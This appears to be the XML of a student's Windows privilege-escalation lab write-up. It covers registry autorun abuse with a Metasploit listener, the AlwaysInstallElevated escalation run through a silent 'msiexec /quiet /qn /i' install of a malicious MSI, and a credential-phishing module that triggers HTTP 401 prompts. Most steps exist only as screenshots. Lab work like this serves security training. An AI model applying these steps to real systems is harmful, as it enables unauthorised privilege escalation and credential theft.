    <w:p w14:paraId="1C0E6359" w14:textId="218F97B7" w:rsidR="00D2324A" w:rsidRDefault="00D41993" w:rsidP="00D41993">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="00D41993">
        <w:t>Exercise 7 – Registry (Autorun)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CBC1D20" w14:textId="708AC5A1" w:rsidR="00D41993" w:rsidRDefault="00D41993" w:rsidP="00D41993">
      <w:r>
        <w:t xml:space="preserve">After running </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>PowerUp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00BE438A">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> bellow result can be found </w:t>
      </w:r>
      <w:r w:rsidR="00924DD5">
        <w:t>and check the permission that program</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A758FF0" w14:textId="4FE30788" w:rsidR="00D41993" w:rsidRDefault="00D41993" w:rsidP="00D41993">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2E32A5F9" wp14:editId="55AC2EE4">
            <wp:extent cx="61341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34100" cy="914400"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4062A065" w14:textId="517CF988" w:rsidR="003142FF" w:rsidRDefault="003142FF" w:rsidP="00D41993">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="37E4592E" wp14:editId="1B129BB6">
            <wp:extent cx="6118860" cy="9188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18860" cy="918845"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="427DB291" w14:textId="66AA69B2" w:rsidR="009C4525" w:rsidRDefault="009C4525" w:rsidP="00D41993">
      <w:r>
        <w:t xml:space="preserve">After creating that malicious file, we must log off session and log back </w:t>
      </w:r>
      <w:r w:rsidR="00924DD5">
        <w:t>with admin privilege user, in my case “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00924DD5">
        <w:t>pentest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00924DD5">
        <w:t xml:space="preserve">” user have admin privileges. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F009383" w14:textId="5330CAF5" w:rsidR="00924DD5" w:rsidRDefault="00924DD5" w:rsidP="00D41993">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="31C393F0" wp14:editId="21231DC6">
            <wp:extent cx="6355080" cy="14478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55080" cy="1447800"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="11E70880" w14:textId="123B8408" w:rsidR="00924DD5" w:rsidRDefault="009F3ACC" w:rsidP="00D41993">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251672064" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="623D9A76" wp14:editId="3E6E7DFF">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-495300</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>1684020</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6789420" cy="310896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789420" cy="3108960"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="margin">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="margin">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00924DD5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6D3CB02B" wp14:editId="1BD7BA0C">
            <wp:extent cx="5943600" cy="1565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565275"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FF20E66" w14:textId="38F7B730" w:rsidR="00924DD5" w:rsidRDefault="00924DD5" w:rsidP="00D41993"/>
    <w:p w14:paraId="0D951F45" w14:textId="77777777" w:rsidR="00924DD5" w:rsidRDefault="00924DD5" w:rsidP="00D41993"/>
    <w:p w14:paraId="7EFD966F" w14:textId="121F3B40" w:rsidR="003142FF" w:rsidRDefault="003142FF" w:rsidP="00D41993"/>
    <w:p w14:paraId="1BD9EFF7" w14:textId="62668E68" w:rsidR="009C4525" w:rsidRDefault="009C4525" w:rsidP="00D41993"/>
    <w:p w14:paraId="258742E0" w14:textId="040E7667" w:rsidR="009C4525" w:rsidRDefault="009C4525" w:rsidP="00D41993"/>
    <w:p w14:paraId="39E0F9B4" w14:textId="7331693A" w:rsidR="009C4525" w:rsidRDefault="009C4525" w:rsidP="00D41993"/>
    <w:p w14:paraId="499EDE11" w14:textId="6EB9FFB9" w:rsidR="009C4525" w:rsidRDefault="009C4525" w:rsidP="00D41993"/>
    <w:p w14:paraId="70945C55" w14:textId="05D13A41" w:rsidR="009C4525" w:rsidRDefault="009C4525" w:rsidP="00D41993"/>
    <w:p w14:paraId="46B48BC8" w14:textId="11B32C48" w:rsidR="009F3ACC" w:rsidRDefault="009F3ACC" w:rsidP="00D41993"/>
    <w:p w14:paraId="21B68672" w14:textId="0FE8089E" w:rsidR="009F3ACC" w:rsidRDefault="009F3ACC" w:rsidP="00D41993"/>
    <w:p w14:paraId="539F55E9" w14:textId="22AFB48C" w:rsidR="000B6E17" w:rsidRDefault="000B6E17" w:rsidP="00D41993"/>
    <w:p w14:paraId="18CD6260" w14:textId="37B72B42" w:rsidR="009F3ACC" w:rsidRDefault="009F3ACC" w:rsidP="00D41993"/>
    <w:p w14:paraId="09034FC8" w14:textId="465F7DDC" w:rsidR="000B6E17" w:rsidRDefault="000B6E17" w:rsidP="00D41993">
      <w:r>
        <w:t xml:space="preserve">After I start Metasploit console and set </w:t>
      </w:r>
      <w:r w:rsidR="00FD724A">
        <w:t>listener,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and logoff from the windows machine</w:t>
      </w:r>
      <w:r w:rsidR="00FD724A">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="397EE37B" w14:textId="4B01F137" w:rsidR="009F3ACC" w:rsidRDefault="009F3ACC" w:rsidP="00D41993">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="491C0864" wp14:editId="72233054">
            <wp:extent cx="5943600" cy="18370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837055"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="56E5FD77" w14:textId="71628052" w:rsidR="000B6E17" w:rsidRDefault="009F3ACC" w:rsidP="00D41993">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6EBE7C6D" wp14:editId="176790BE">
            <wp:extent cx="5876925" cy="1402080"/>
            <wp:effectExtent l="0" t="0" r="952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76925" cy="1402080"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AE1CC03" w14:textId="4F538FD9" w:rsidR="000B6E17" w:rsidRDefault="000B6E17" w:rsidP="00D41993">
      <w:r>
        <w:t xml:space="preserve">After </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>PopUp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> I logged with “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pentest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>” user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68438F73" w14:textId="3509FB29" w:rsidR="009F3ACC" w:rsidRDefault="009F3ACC" w:rsidP="00D41993">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5D04FD13" wp14:editId="236DB286">
            <wp:extent cx="4543425" cy="18002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43425" cy="1800225"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AF534B4" w14:textId="69E9C5BE" w:rsidR="000B6E17" w:rsidRDefault="000B6E17" w:rsidP="00D41993">
      <w:r>
        <w:t>After logging session is created and I change the user privilege success fully.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3979D31E" w14:textId="0CEC6163" w:rsidR="000B6E17" w:rsidRDefault="000B6E17" w:rsidP="00D41993">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="52D446D4" wp14:editId="0B9C7976">
            <wp:extent cx="6431280" cy="27432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31280" cy="2743200"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6360CB4F" w14:textId="0A6A0551" w:rsidR="00723B61" w:rsidRDefault="00723B61" w:rsidP="00D41993"/>
    <w:p w14:paraId="205AB6BD" w14:textId="532140FC" w:rsidR="00E0317B" w:rsidRDefault="00E0317B" w:rsidP="00D41993"/>
    <w:p w14:paraId="3DC6D299" w14:textId="0F8A0343" w:rsidR="00E0317B" w:rsidRDefault="00E0317B" w:rsidP="00D41993"/>
    <w:p w14:paraId="3CABE659" w14:textId="77777777" w:rsidR="00E0317B" w:rsidRDefault="00E0317B" w:rsidP="00D41993"/>
    <w:p w14:paraId="3F20CFE8" w14:textId="675B220B" w:rsidR="00E0317B" w:rsidRDefault="00E0317B" w:rsidP="00E0317B">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="00E0317B">
        <w:lastRenderedPageBreak/>
        <w:t>Exercise 8 – Registry (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E0317B">
        <w:t>AlwaysInstallElevated</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E0317B">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E35E1B4" w14:textId="68E3AE7F" w:rsidR="00E0317B" w:rsidRDefault="00E0317B" w:rsidP="00E0317B">
      <w:r>
        <w:t xml:space="preserve">In </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>PowerUP</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="01AA3E31" w14:textId="29B0C956" w:rsidR="00E0317B" w:rsidRDefault="00E0317B" w:rsidP="00E0317B">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7D6272A9" wp14:editId="5BF0DAD9">
            <wp:extent cx="5943600" cy="10388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038860"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E28BC62" w14:textId="2F6A9697" w:rsidR="00E0317B" w:rsidRDefault="009B4CE4" w:rsidP="00E0317B">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009B4CE4">
        <w:t>AlwaysInstallElevated</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009B4CE4">
        <w:t xml:space="preserve"> is functionality that offers all users</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009B4CE4">
        <w:t xml:space="preserve">(especially the low privileged user) on a windows machine to run any MSI file with elevated </w:t>
      </w:r>
      <w:r w:rsidR="00D83A1E" w:rsidRPr="00D83A1E">
        <w:t>(system)</w:t>
      </w:r>
      <w:r w:rsidR="00D83A1E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009B4CE4">
        <w:t>privileges. MSI is a Microsoft based installer package file format which is used for installing, storing and removing of a program.</w:t>
      </w:r>
      <w:r w:rsidR="00D83A1E">
        <w:t xml:space="preserve"> In Microsoft article : </w:t>
      </w:r>
      <w:hyperlink r:id="rId74" w:history="1">
        <w:r w:rsidR="00D83A1E" w:rsidRPr="00956BCB">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://docs.microsoft.com/en-us/windows/win32/msi/alwaysinstallelevated</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00D83A1E">
        <w:t xml:space="preserve"> clearly explain how it work. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="446A570B" w14:textId="39C111B7" w:rsidR="00D83A1E" w:rsidRDefault="00D83A1E" w:rsidP="00E0317B">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5042391B" wp14:editId="70D6EB80">
            <wp:extent cx="5943600" cy="18700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870075"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ED15BCB" w14:textId="5A097BC7" w:rsidR="00D83A1E" w:rsidRPr="00E0317B" w:rsidRDefault="00D83A1E" w:rsidP="00E0317B">
      <w:r>
        <w:t>We can clearly see registry value is set to 1 so we can run “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>msi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">” program without admin </w:t>
      </w:r>
      <w:r w:rsidR="00435D6E">
        <w:t>privileged</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1281AB7E" w14:textId="4FC666B4" w:rsidR="00723B61" w:rsidRDefault="00D83A1E" w:rsidP="00D41993">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="747B923B" wp14:editId="09FFEA02">
            <wp:extent cx="5943600" cy="12020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202055"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="764E012F" w14:textId="10E289A6" w:rsidR="002652FF" w:rsidRDefault="00D97C90" w:rsidP="00D41993">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="18BB50C8" wp14:editId="634EA34A">
            <wp:extent cx="5943600" cy="17621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762125"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DC7648B" w14:textId="2D78F887" w:rsidR="00D97C90" w:rsidRDefault="00D97C90" w:rsidP="00D41993">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">After Running </w:t>
      </w:r>
      <w:r w:rsidR="000131ED">
        <w:t>“</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="000131ED" w:rsidRPr="000131ED">
        <w:t>msiexec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="000131ED" w:rsidRPr="000131ED">
        <w:t xml:space="preserve"> /quiet /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="000131ED" w:rsidRPr="000131ED">
        <w:t>qn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="000131ED" w:rsidRPr="000131ED">
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="000131ED" w:rsidRPr="000131ED">
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="000131ED" w:rsidRPr="000131ED">
        <w:t xml:space="preserve"> C:\Temp\setup.msi</w:t>
      </w:r>
      <w:r w:rsidR="000131ED">
        <w:t xml:space="preserve">” this command </w:t>
      </w:r>
      <w:r w:rsidR="00A71B9D">
        <w:t xml:space="preserve">it will popup prompt and hide it automatically </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26F6DA34" w14:textId="2B5F92BD" w:rsidR="00D97C90" w:rsidRDefault="00D97C90" w:rsidP="00D41993">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="238CF624" wp14:editId="2F0C39A4">
            <wp:extent cx="5943600" cy="32353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235325"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C8D1C81" w14:textId="54620595" w:rsidR="00D97C90" w:rsidRDefault="00D97C90" w:rsidP="00D41993">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4F7D0E8D" wp14:editId="15E86E77">
            <wp:extent cx="5943600" cy="6032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603250"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="02FBBB46" w14:textId="0864405A" w:rsidR="00D97C90" w:rsidRDefault="005C7DA9" w:rsidP="00D41993">
      <w:r>
        <w:t xml:space="preserve">Quite ---&gt; Quiet mode </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CA87706" w14:textId="460379EC" w:rsidR="00A71B9D" w:rsidRDefault="005C7DA9" w:rsidP="00D41993">
      <w:r>
        <w:t xml:space="preserve">q---&gt; Set user </w:t>
      </w:r>
      <w:r w:rsidR="00A71B9D">
        <w:t>Interface</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50DDF54F" w14:textId="6E18BC7A" w:rsidR="00A71B9D" w:rsidRDefault="005C7DA9" w:rsidP="00D41993">
      <w:r>
        <w:t xml:space="preserve"> n --&gt; no UI </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09057079" w14:textId="0E693844" w:rsidR="005C7DA9" w:rsidRDefault="005C7DA9" w:rsidP="00D41993">
      <w:r>
        <w:t xml:space="preserve"> I --&gt; status message </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75A040E5" w14:textId="1FE69A3D" w:rsidR="00A71B9D" w:rsidRDefault="00A71B9D" w:rsidP="00D41993"/>
    <w:p w14:paraId="1286BAC6" w14:textId="78735D9C" w:rsidR="00A71B9D" w:rsidRDefault="00A71B9D" w:rsidP="00D41993"/>
    <w:p w14:paraId="7CDB180A" w14:textId="7C3626E6" w:rsidR="001D2DC1" w:rsidRDefault="001D2DC1" w:rsidP="00D41993"/>
    <w:p w14:paraId="447F3BB7" w14:textId="6022C68D" w:rsidR="001D2DC1" w:rsidRDefault="001D2DC1" w:rsidP="00D41993"/>
    <w:p w14:paraId="3127FEB8" w14:textId="6663971B" w:rsidR="001D2DC1" w:rsidRDefault="001D2DC1" w:rsidP="00D41993"/>
    <w:p w14:paraId="15A8E4D7" w14:textId="0B5FD384" w:rsidR="001D2DC1" w:rsidRDefault="001D2DC1" w:rsidP="00D41993"/>
    <w:p w14:paraId="76422666" w14:textId="62C800C7" w:rsidR="001D2DC1" w:rsidRDefault="001D2DC1" w:rsidP="00D41993"/>
    <w:p w14:paraId="2DD2B786" w14:textId="07D7525F" w:rsidR="001D2DC1" w:rsidRDefault="001D2DC1" w:rsidP="00D41993"/>
    <w:p w14:paraId="0154648C" w14:textId="1DA20243" w:rsidR="001D2DC1" w:rsidRDefault="001D2DC1" w:rsidP="00D41993"/>
    <w:p w14:paraId="6B3D8F0B" w14:textId="247514EC" w:rsidR="001D2DC1" w:rsidRDefault="001D2DC1" w:rsidP="001D2DC1">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251673088" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="56283812" wp14:editId="44FF4E99">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>-693420</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>220980</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="7018020" cy="318516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018020" cy="3185160"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="margin">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="margin">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="001D2DC1">
        <w:t>Exercise 9 – Password Mining (Memory)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C2CE047" w14:textId="6DA3154D" w:rsidR="001D2DC1" w:rsidRPr="001D2DC1" w:rsidRDefault="001D2DC1" w:rsidP="001D2DC1"/>
    <w:p w14:paraId="1EF00D99" w14:textId="11771CFA" w:rsidR="003C78A0" w:rsidRDefault="003C78A0" w:rsidP="00D41993"/>
    <w:p w14:paraId="219F4AAF" w14:textId="3B45B05E" w:rsidR="001D2DC1" w:rsidRDefault="001D2DC1" w:rsidP="00D41993"/>
    <w:p w14:paraId="7B8BDA84" w14:textId="3F4AE806" w:rsidR="001D2DC1" w:rsidRDefault="001D2DC1" w:rsidP="00D41993"/>
    <w:p w14:paraId="37B40193" w14:textId="0FAD449D" w:rsidR="001D2DC1" w:rsidRDefault="001D2DC1" w:rsidP="00D41993"/>
    <w:p w14:paraId="052DF735" w14:textId="4F715A42" w:rsidR="001D2DC1" w:rsidRDefault="001D2DC1" w:rsidP="00D41993"/>
    <w:p w14:paraId="4AA0840C" w14:textId="0AF693AF" w:rsidR="001D2DC1" w:rsidRDefault="001D2DC1" w:rsidP="00D41993"/>
    <w:p w14:paraId="308C5374" w14:textId="126A496F" w:rsidR="001D2DC1" w:rsidRDefault="001D2DC1" w:rsidP="00D41993"/>
    <w:p w14:paraId="128FD4F5" w14:textId="32E9863C" w:rsidR="001D2DC1" w:rsidRDefault="001D2DC1" w:rsidP="00D41993"/>
    <w:p w14:paraId="43CF6D5C" w14:textId="07A339CB" w:rsidR="001D2DC1" w:rsidRDefault="001D2DC1" w:rsidP="00D41993"/>
    <w:p w14:paraId="1BECCC48" w14:textId="6665AE16" w:rsidR="001D2DC1" w:rsidRDefault="001D2DC1" w:rsidP="00D41993"/>
    <w:p w14:paraId="65D46A37" w14:textId="20FBB339" w:rsidR="001D2DC1" w:rsidRDefault="001D2DC1" w:rsidP="00D41993"/>
    <w:p w14:paraId="7317531E" w14:textId="253F7465" w:rsidR="001D2DC1" w:rsidRDefault="001D2DC1" w:rsidP="00D41993">
      <w:r w:rsidRPr="001D2DC1">
        <w:t>This module responds to all requests for resources with a HTTP 40</w:t>
      </w:r>
      <w:r w:rsidR="00390EF8">
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="001D2DC1">
        <w:t>. This should cause most browsers to prompt for a credential. If the user enters Basic Auth creds they are sent to the console. This may be helpful in some phishing expeditions where it is possible to embed a resource into a page</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00646E89">
        <w:t xml:space="preserve"> After running this module type the Attacker </w:t>
      </w:r>
      <w:r w:rsidR="009A4F8E">
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidR="00646E89">
        <w:t xml:space="preserve"> in the internet explorer.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="592747A9" w14:textId="64B96D40" w:rsidR="00646E89" w:rsidRDefault="00390EF8" w:rsidP="00D41993">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="38A12D28" wp14:editId="1A4E2981">
            <wp:extent cx="5800725" cy="22383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00725" cy="2238375"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DFB0EF0" w14:textId="3B46852A" w:rsidR="009A4F8E" w:rsidRDefault="00390EF8" w:rsidP="00D41993">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1B7E4DA5" wp14:editId="40CCA6E0">
            <wp:extent cx="5086350" cy="34594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86350" cy="3459480"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B6F8084" w14:textId="6445E98A" w:rsidR="00390EF8" w:rsidRDefault="00390EF8" w:rsidP="00D41993">
      <w:r>
        <w:t>After entering the privileged user password, we can dup or live monitor from “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="008D76DF">
        <w:t xml:space="preserve"> in my case I haven’t set the privileged user (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="008D76DF">
        <w:t>pentest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="008D76DF">
        <w:t>) password.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="691D3476" w14:textId="062AC189" w:rsidR="008D76DF" w:rsidRDefault="008D76DF" w:rsidP="00D41993">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="706018CD" wp14:editId="10344E61">
            <wp:extent cx="5943600" cy="41452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145280"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
